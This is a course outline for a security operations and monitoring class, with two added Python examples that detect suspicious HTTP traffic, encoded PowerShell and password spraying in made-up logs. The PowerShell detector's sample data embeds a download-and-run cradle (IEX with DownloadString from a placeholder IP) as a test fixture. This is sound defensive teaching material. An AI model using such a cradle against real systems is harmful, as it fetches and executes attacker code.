SEC 511 Course

Standing up a security operations center, and preparing the infrastructure for it, is one of the critical stages of a security program. In this course we learn what a defensible architecture looks like for a security operations center (SOC), which sensors must be included, and which equipment should be deployed where. We also learn how to monitor effectively at the network level and at the endpoint level, on both clients and servers. We learn how to analyze the various kinds of traffic and extract artifacts from endpoints, how to find malware hidden in encrypted traffic, and how to automate security monitoring.

Course prerequisites

  • SEC 504
  • Strong command of TCP/IP and the network layers

Course audience

  • Security specialists
  • Incident response team specialists
  • Security operations center (SOC) specialists

Course outline

  • Traditional Security Architecture
    • Perimeter-focused
    • Addressed Layer 3/4
    • Centralized Information Systems
    • Prevention-Oriented
    • Device-driven
    • Traditional Attack Techniques
  • Modern Security Architecture Principles
    • Detection-oriented
    • Post-Exploitation-focused
    • Decentralized Information Systems/Data
    • Risk-informed
    • Layer 7 Aware
    • Security Operations Centers
    • Network Security Monitoring
    • Continuous Security Monitoring
    • Modern Attack Techniques
    • Adversarial Dominance
  • Frameworks and Enterprise Security Architecture
    • Enterprise Security Architecture
    • Security Frameworks
  • Security Architecture – Key Techniques/Practices
    • Threat Vector Analysis
    • Data Exfiltration Analysis
    • Detection Dominant Design
    • Intrusion Kill Chain
    • Visibility Analysis
    • Data Visualization
    • Lateral Movement Analysis
    • Data Ingress/Egress Mapping
    • Internal Segmentation
    • Network Security Monitoring
    • Continuous Security Monitoring
  • Security Operations Center (SOC)
    • Purpose of a SOC
    • Key SOC roles
    • Relationship to Defensible Security Architecture

SOCs/Security Architecture – Key Infrastructure Devices

  • Traditional and Next-Generation Firewalls, and NIPS
  • Web Application Firewall
  • Malware Detonation Devices
  • HTTP Proxies, Web Content Filtering, and SSL/TLS Decryption
  • SIEMs, NIDS, Packet Captures, and DLP
  • Honeypots/Honeynets
  • Network Infrastructure – Routers, Switches, DHCP, DNS
  • Mobile Devices and Wireless Access Points
  • Threat Intelligence

Segmented Internal Networks

  • Routers
  • Internal SI Firewalls
  • VLANs
  • Detecting the Pivot
  • DNS architecture
  • Encrypted DNS including DNS over HTTPS (DoH) and DNS over TLS (DoT)

Defensible Network Security Architecture Principles Applied

  • Internal Segmentation
  • Threat Vector Analysis
  • Data Exfiltration Analysis
  • Detection Dominant Design
  • Zero Trust Model (Kindervag)
  • Intrusion Kill Chain
  • Visibility Analysis
  • Data Visualization
  • Lateral Movement Analysis
  • Data Ingress/Egress Mapping

Continuous Monitoring Overview

  • Defined
  • Network Security Monitoring (NSM)
  • Continuous Security Monitoring (CSM)
  • Continuous Monitoring and the 20 Critical Security Controls

Network Security Monitoring (NSM)

  • Evolution of NSM
  • The NSM Toolbox
  • NIDS Design
  • Analysis Methodology
  • Understanding Data Sources
    • Full Packet Capture
    • Extracted Data
    • String Data
    • Flow Data
    • Transaction Data
    • Statistical Data
    • Alert Data
    • Tagged Data
    • Correlated Data
  • Cloud NSM
  • Practical NSM Issues
  • Cornerstone NSM
    • Service-Side and Client-Side Exploits
    • Identifying High-Entropy Strings
    • Tracking EXE Transfers
    • Identifying Command and Control (C2) Traffic
    • Tracking User Agents
    • C2 via HTTPS
    • Tracking Encryption Certificates
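Two of the Cornerstone NSM items above, identifying high-entropy strings and tracking user agents, are named without being shown. The following is an added example in Python, not course material from SEC 511 or SANS: it parses a constructed Zeek-style HTTP transaction log (made up for the example, not a real capture), scores URI tokens by Shannon entropy so that encoded or random-looking strings surface, and profiles User-Agent strings per source so that a UA used by only one host stands out. The tab-separated field layout, the thresholds (16 characters, 4.0 bits per character), and the sample addresses and hostnames are all assumptions of the example.

```python
import math
import re
from collections import Counter, defaultdict

# Constructed sample log (not a real capture) in a Zeek http.log-like,
# tab-separated layout: ts, source address, destination address, Host header,
# URI, User-Agent. The last three requests carry random-looking path tokens
# and a User-Agent no other host on the network uses.
SAMPLE_HTTP_LOG = """\
1700000000.1\t10.0.0.5\t93.184.216.34\twww.example.com\t/index.html\tMozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/120.0
1700000001.2\t10.0.0.5\t93.184.216.34\twww.example.com\t/css/site.css\tMozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/120.0
1700000002.3\t10.0.0.7\t203.0.113.9\tupdates.example.net\t/check?id=4821\tMozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/120.0
1700000003.4\t10.0.0.9\t198.51.100.23\tcdn.example.org\t/a/ZK9xQ2vL8mT1nR4pW7yB3cH6jF0dS5gA\tMozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/120.0
1700000004.5\t10.0.0.9\t198.51.100.23\tcdn.example.org\t/a/Q7wE2rT9yU4iO1pA6sD3fG8hJ5kL0zX\tMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
1700000005.6\t10.0.0.9\t198.51.100.23\tcdn.example.org\t/a/M3nB6vC9xZ2lK5jH8gF1dS4aP7oI0uY\tMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
"""

FIELDS = ("ts", "src", "dst", "host", "uri", "user_agent")


def parse_http_log(text):
    """Parse the tab-separated layout above into a list of dicts, skipping comments and short rows."""
    records = []
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        parts = line.split("\t")
        if len(parts) != len(FIELDS):
            continue
        records.append(dict(zip(FIELDS, parts)))
    return records


def shannon_entropy(s):
    """Bits per character; a 32-character string of 32 distinct characters scores 5.0."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


# Split a URI into path segments and query names/values.
_TOKEN_SPLIT = re.compile(r"[/?&=.]")


def high_entropy_tokens(records, min_len=16, threshold=4.0):
    """Flag URI tokens that are both long and random-looking (encoded data, DGA-like labels)."""
    hits = []
    for rec in records:
        for token in _TOKEN_SPLIT.split(rec["uri"]):
            if len(token) < min_len:
                continue
            h = shannon_entropy(token)
            if h > threshold:
                hits.append({"src": rec["src"], "host": rec["host"],
                             "token": token, "entropy": round(h, 2)})
    return hits


def user_agent_profile(records):
    """Per User-Agent: request count and the set of internal sources that sent it."""
    profile = defaultdict(lambda: {"requests": 0, "hosts": set()})
    for rec in records:
        entry = profile[rec["user_agent"]]
        entry["requests"] += 1
        entry["hosts"].add(rec["src"])
    return dict(profile)


def rare_user_agents(records, max_hosts=1):
    """User-Agents seen from max_hosts or fewer sources; a string only one host uses deserves a look."""
    return {ua: p for ua, p in user_agent_profile(records).items()
            if len(p["hosts"]) <= max_hosts}


if __name__ == "__main__":
    recs = parse_http_log(SAMPLE_HTTP_LOG)
    for hit in high_entropy_tokens(recs):
        print("high-entropy token", hit)
    for ua, p in rare_user_agents(recs).items():
        print("rare user agent", ua, sorted(p["hosts"]), p["requests"])
```

On real Zeek data the same functions apply to the uri and user_agent columns of http.log. Treat the entropy threshold as a starting point rather than an alert: CDN cache-busters, session tokens and signed URLs also score high, so the hit list is a triage queue to be read together with the destination host and the per-source user-agent profile.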

Security Architecture – Endpoint Protection

  • Anti-Malware
  • Host-based Firewall, Host-based IDS/IPS
  • Application Control, Application Virtualization
  • Privileged Accounts, Authentication, Monitoring, and UAC
  • Virtual Desktop Infrastructure
  • Browser Security
  • EMET and Defender Exploit Guard

Patching

  • Process
  • To Test or Not to Test
  • Microsoft
  • Third-Party

  • Overview
    • Continuous Security Monitoring (CSM) vs. Continuous Diagnostics and Mitigation (CDM) vs. Information Security Continuous Monitoring (ISCM)
    • Cyberscope and SCAP
  • Industry Best Practices
    • Continuous Monitoring and the 20 CIS Critical Security Controls
    • Australian Signals Directorate (ASD) Strategies to Mitigate Targeted Cyber Intrusions
  • Winning CSM Techniques
  • Maintaining Situational Awareness
  • Host, Port, and Service Discovery
  • Vulnerability Scanning
  • Monitoring Patching
  • Monitoring Applications
  • Monitoring Service Logs
    • Detecting Malware via DNS logs
  • Monitoring Change to Devices and Appliances
  • Leveraging Proxy and Firewall Data
  • Configuring Centralized Windows Event Log Collection
  • Monitoring Critical Windows Events
    • Hands-on: Detecting Malware via Windows Event Logs
  • Scripting and Automation
    • Importance of Automation
    • PowerShell
    • DeepBlueCLI
    • Hands-on: Detecting Malicious Registry Run Keys with PowerShell
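The hands-on items above on detecting malware via Windows event logs and on DeepBlueCLI name the techniques without showing them. The following is an added example in Python; it is neither DeepBlueCLI itself nor material from the course. It applies two of the detections DeepBlueCLI is known for to a constructed set of event records: decoding the -EncodedCommand argument of PowerShell command lines found in event 4688 (process creation), and spotting a password spray in event 4625 (failed logon), where one source address fails against many distinct accounts in a short window. The event dictionaries and their field names, the 60-second window, the 10-account threshold, and every host, user and address in the sample are assumptions of the example (made-up data, not real logs).

```python
import base64
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample records (not real logs). Field names follow the Security
# log event data a collector such as Windows Event Forwarding ships; the
# hosts, users and addresses are invented for the example.
_PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/a.ps1')"
_ENCODED = base64.b64encode(_PAYLOAD.encode("utf-16-le")).decode("ascii")

SAMPLE_EVENTS = [
    {"EventID": 4688, "Time": "2024-01-10T09:00:01", "Computer": "WS01",
     "CommandLine": "cmd.exe /c dir C:\\Users"},
    {"EventID": 4688, "Time": "2024-01-10T09:00:07", "Computer": "WS01",
     "CommandLine": "powershell.exe -NoP -W Hidden -enc " + _ENCODED},
    {"EventID": 4624, "Time": "2024-01-10T09:01:00", "Computer": "DC01",
     "TargetUserName": "alice", "IpAddress": "10.0.0.5"},
    {"EventID": 4625, "Time": "2024-01-10T09:02:00", "Computer": "DC01",
     "TargetUserName": "alice", "IpAddress": "10.0.0.5"},
]
# Twelve failed logons for twelve different accounts from one source within a
# few seconds: the classic password-spray shape.
for i in range(12):
    SAMPLE_EVENTS.append({"EventID": 4625, "Time": f"2024-01-10T09:05:{i:02d}",
                          "Computer": "DC01", "TargetUserName": f"user{i:02d}",
                          "IpAddress": "192.0.2.10"})

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -en,
# -enc, ...); the argument is base64 of the script text encoded as UTF-16LE.
_ENC_RE = re.compile(r"-e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})",
                     re.IGNORECASE)


def decode_encoded_powershell(command_line):
    """Return the decoded script if command_line carries an encoded command, else None."""
    m = _ENC_RE.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def detect_encoded_powershell(events):
    """Event 4688 whose command line carries an encoded PowerShell command."""
    hits = []
    for ev in events:
        if ev.get("EventID") != 4688:
            continue
        decoded = decode_encoded_powershell(ev.get("CommandLine", ""))
        if decoded is not None:
            hits.append({"Time": ev["Time"], "Computer": ev["Computer"],
                         "decoded": decoded})
    return hits


def detect_password_spray(events, window_seconds=60, min_accounts=10):
    """Event 4625: one source failing against many distinct accounts inside a
    sliding window. Returns [(ip, distinct_accounts_in_best_window), ...]."""
    by_ip = defaultdict(list)
    for ev in events:
        if ev.get("EventID") == 4625 and ev.get("IpAddress"):
            by_ip[ev["IpAddress"]].append(
                (datetime.fromisoformat(ev["Time"]), ev["TargetUserName"]))
    window = timedelta(seconds=window_seconds)
    findings = []
    for ip, attempts in by_ip.items():
        attempts.sort()
        best = 0
        for i, (start, _) in enumerate(attempts):
            accounts = {user for t, user in attempts[i:] if t - start <= window}
            best = max(best, len(accounts))
        if best >= min_accounts:
            findings.append((ip, best))
    return findings


def run_detections(events):
    """Run both detections and return their findings keyed by name."""
    return {"encoded_powershell": detect_encoded_powershell(events),
            "password_spray": detect_password_spray(events)}


if __name__ == "__main__":
    for name, findings in run_detections(SAMPLE_EVENTS).items():
        print(name, findings)
```

Event 4688 only carries the command line when process-creation auditing is on and the "Include command line in process creation events" policy is enabled; without it the encoded-command check has nothing to read. The spray detector keys on the source address in 4625, which is blank for some logon types, so on real data also consider grouping by workstation name.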